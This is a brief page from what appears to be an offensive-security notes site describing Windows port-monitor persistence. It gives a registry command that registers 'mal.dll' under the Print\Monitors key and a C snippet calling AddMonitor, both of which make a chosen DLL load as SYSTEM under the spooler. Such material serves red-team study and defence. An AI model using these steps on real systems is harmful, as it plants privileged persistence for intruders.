Port Monitor

Windows provides printing functionality to the user and allows the user to add port monitors for more extendibility. Port monitor is a DLL which connects the spooling service and a printer, and allows to send raw device commands to the printer. We can abuse this for persistence by adding our own arbitrary dll that acts as a "monitor" .

This will be executed as SYSTEM, and will be spawned under spoolsv.exe.

We can do this in 2 ways, via registry or via the AddMonitor function. To do this via registry: 

copy c:\mal.dll c:\windows\system32\
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\PortMonitor" /v Driver /t REG_SZ /d "mal.dll" /f

To do this with the AddMonitor function, here is a code snippet from ired.team that does achieves this: 

#include "Windows.h"
 
int main() {
    MONITOR_INFO_2 monitorInfo;
    TCHAR env[12] = TEXT("Windows x64");
    TCHAR name[12] = TEXT("Monitor");
    TCHAR dll[12] = TEXT("test.dll");
    monitorInfo.pName = name;
    monitorInfo.pEnvironment = env;
    monitorInfo.pDLLName = dll;
    AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
    return 0;
}

Test.dll is the dll that would be persisted, note that you have to copy this over to the system32 folder before you run the above code.

Resources

PreviousAppInit DllsNextWMI Event Subscriptions

Last updated